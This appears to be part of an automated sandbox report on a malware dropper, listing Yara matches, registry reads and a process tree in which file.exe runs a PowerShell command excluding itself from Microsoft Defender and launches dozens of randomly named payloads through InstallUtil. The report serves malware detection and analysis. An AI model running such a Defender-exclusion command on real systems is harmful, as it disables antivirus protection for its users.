                        Source: Yara matchFile source: 16.0.weblinkanalyzer.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.0.weblinkanalyzer.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 20.2.BroomSetup.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000015.00000000.2055445939.0000000000401000.00000020.00000001.01000000.00000011.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000010.00000000.2004294396.0000000000401000.00000020.00000001.01000000.00000011.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000002.3151972256.0000000000401000.00000040.00000001.01000000.00000016.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Web Link Analyzer\is-5KR53.tmp, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe, type: DROPPED
                        Source: Yara matchFile source: C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exe, type: DROPPED
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" "
                        Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                        Source: file.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
                        Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: syncUpd.exe, 00000011.00000002.3304406810.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, syncUpd.exe, 00000011.00000002.3216469084.000000001AD81000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000011.00000002.3320826315.000000006A5DF000.00000002.00000001.01000000.00000034.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: syncUpd.exe, 00000011.00000002.3304406810.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, syncUpd.exe, 00000011.00000002.3216469084.000000001AD81000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000011.00000002.3320826315.000000006A5DF000.00000002.00000001.01000000.00000034.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                        Source: syncUpd.exe, 00000011.00000002.3304406810.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, syncUpd.exe, 00000011.00000002.3216469084.000000001AD81000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000011.00000002.3320826315.000000006A5DF000.00000002.00000001.01000000.00000034.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                        Source: syncUpd.exe, 00000011.00000002.3304406810.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, syncUpd.exe, 00000011.00000002.3216469084.000000001AD81000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000011.00000002.3320826315.000000006A5DF000.00000002.00000001.01000000.00000034.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                        Source: syncUpd.exe, syncUpd.exe, 00000011.00000002.3304406810.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, syncUpd.exe, 00000011.00000002.3216469084.000000001AD81000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000011.00000002.3320826315.000000006A5DF000.00000002.00000001.01000000.00000034.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                        Source: syncUpd.exe, 00000011.00000002.3304406810.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, syncUpd.exe, 00000011.00000002.3216469084.000000001AD81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                        Source: syncUpd.exe, 00000011.00000002.3304406810.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, syncUpd.exe, 00000011.00000002.3216469084.000000001AD81000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000011.00000002.3320826315.000000006A5DF000.00000002.00000001.01000000.00000034.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                        Source: syncUpd.exe, 00000011.00000002.3304406810.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, syncUpd.exe, 00000011.00000002.3216469084.000000001AD81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                        Source: syncUpd.exe, 00000011.00000002.3304406810.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, syncUpd.exe, 00000011.00000002.3216469084.000000001AD81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                        Source: file.exeReversingLabs: Detection: 18%
                        Source: fwUkFVOLVOFs3NY104r7giRJ.exeString found in binary or memory: need to be updated. /RESTARTAPPLICATIONS Instructs Setup to restart applications. /NORESTARTAPPLICATIONS Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file after having checked t
                        Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -Force
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 456 -p 7564 -ip 7564
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7564 -s 73500
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe "C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Source: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exeProcess created: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp "C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp" /SL5="$104B0,1807550,56832,C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exe "C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exe"
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpProcess created: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe "C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe" -i
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeProcess created: C:\Users\user\AppData\Local\Temp\syncUpd.exe C:\Users\user\AppData\Local\Temp\syncUpd.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exe "C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\DAOYzG6VUKOTbMmRBP4iG9FF.exe "C:\Users\user\Pictures\DAOYzG6VUKOTbMmRBP4iG9FF.exe"
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeProcess created: C:\Users\user\AppData\Local\Temp\BroomSetup.exe C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpProcess created: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe "C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe" -s
                        Source: C:\Users\user\Pictures\DAOYzG6VUKOTbMmRBP4iG9FF.exeProcess created: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmp "C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmp" /SL5="$504EC,1807550,56832,C:\Users\user\Pictures\DAOYzG6VUKOTbMmRBP4iG9FF.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exe "C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe "C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe" --silent --allusers=0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\363PwSZXj46RramHioCvzZ7q.exe "C:\Users\user\Pictures\363PwSZXj46RramHioCvzZ7q.exe"
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeProcess created: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2f4,0x2f8,0x2fc,0x2d0,0x300,0x6bfa21c8,0x6bfa21d4,0x6bfa21e0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\aKsTqJOcX9LAZThGesUnxmZk.exe "C:\Users\user\Pictures\aKsTqJOcX9LAZThGesUnxmZk.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe "C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe" --silent --allusers=0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\jBpaTqUJP0LUZLvKSUzQoPLO.exe "C:\Users\user\Pictures\jBpaTqUJP0LUZLvKSUzQoPLO.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\FnzHBAPEbvEEx8ZWWEvo0R6a.exe "C:\Users\user\Pictures\FnzHBAPEbvEEx8ZWWEvo0R6a.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\YeDvL2xULnFqNNxNLIvjO2b6.exe "C:\Users\user\Pictures\YeDvL2xULnFqNNxNLIvjO2b6.exe"
                        Source: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exeProcess created: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2f8,0x2fc,0x300,0x2f4,0x304,0x6b3921c8,0x6b3921d4,0x6b3921e0
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeProcess created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\MX6OxFuxXLJNkbD9F2dPLyyC.exe "C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\MX6OxFuxXLJNkbD9F2dPLyyC.exe" --version
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\mlSjlt4YcfcpuVp4aQsoCouK.exe "C:\Users\user\Pictures\mlSjlt4YcfcpuVp4aQsoCouK.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\f68SQOWBvY0lqnWRcqakARDI.exe "C:\Users\user\Pictures\f68SQOWBvY0lqnWRcqakARDI.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe "C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe" --silent --allusers=0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\IelNhfi6M4d6yMRgQg9Svn6Z.exe "C:\Users\user\Pictures\IelNhfi6M4d6yMRgQg9Svn6Z.exe"
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" "
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\uOoBNdE6Sm5DmPd13osCbhQm.exe "C:\Users\user\Pictures\uOoBNdE6Sm5DmPd13osCbhQm.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Pictures\FnzHBAPEbvEEx8ZWWEvo0R6a.exeProcess created: C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmp "C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmp" /SL5="$30596,1807550,56832,C:\Users\user\Pictures\FnzHBAPEbvEEx8ZWWEvo0R6a.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\23jzBT2gZ2W4aFsNb8WtTEfu.exe "C:\Users\user\Pictures\23jzBT2gZ2W4aFsNb8WtTEfu.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\1EkTthwf6man8aNjDkP3iYby.exe "C:\Users\user\Pictures\1EkTthwf6man8aNjDkP3iYby.exe" --silent --allusers=0
                        Source: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exeProcess created: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2f4,0x2f8,0x2fc,0x2bc,0x300,0x6aa121c8,0x6aa121d4,0x6aa121e0
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe" -ForceJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe "C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exe "C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exe "C:\Users\user\Pictures\0rb7lvvnt87bG7IAtAszCDpT.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\DAOYzG6VUKOTbMmRBP4iG9FF.exe "C:\Users\user\Pictures\DAOYzG6VUKOTbMmRBP4iG9FF.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exe "C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe "C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe" --silent --allusers=0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\363PwSZXj46RramHioCvzZ7q.exe "C:\Users\user\Pictures\363PwSZXj46RramHioCvzZ7q.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\aKsTqJOcX9LAZThGesUnxmZk.exe "C:\Users\user\Pictures\aKsTqJOcX9LAZThGesUnxmZk.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe "C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe" --silent --allusers=0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\jBpaTqUJP0LUZLvKSUzQoPLO.exe "C:\Users\user\Pictures\jBpaTqUJP0LUZLvKSUzQoPLO.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\FnzHBAPEbvEEx8ZWWEvo0R6a.exe "C:\Users\user\Pictures\FnzHBAPEbvEEx8ZWWEvo0R6a.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\YeDvL2xULnFqNNxNLIvjO2b6.exe "C:\Users\user\Pictures\YeDvL2xULnFqNNxNLIvjO2b6.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\mlSjlt4YcfcpuVp4aQsoCouK.exe "C:\Users\user\Pictures\mlSjlt4YcfcpuVp4aQsoCouK.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\f68SQOWBvY0lqnWRcqakARDI.exe "C:\Users\user\Pictures\f68SQOWBvY0lqnWRcqakARDI.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe "C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe" --silent --allusers=0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\IelNhfi6M4d6yMRgQg9Svn6Z.exe "C:\Users\user\Pictures\IelNhfi6M4d6yMRgQg9Svn6Z.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\uOoBNdE6Sm5DmPd13osCbhQm.exe "C:\Users\user\Pictures\uOoBNdE6Sm5DmPd13osCbhQm.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\23jzBT2gZ2W4aFsNb8WtTEfu.exe "C:\Users\user\Pictures\23jzBT2gZ2W4aFsNb8WtTEfu.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\1EkTthwf6man8aNjDkP3iYby.exe "C:\Users\user\Pictures\1EkTthwf6man8aNjDkP3iYby.exe" --silent --allusers=0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
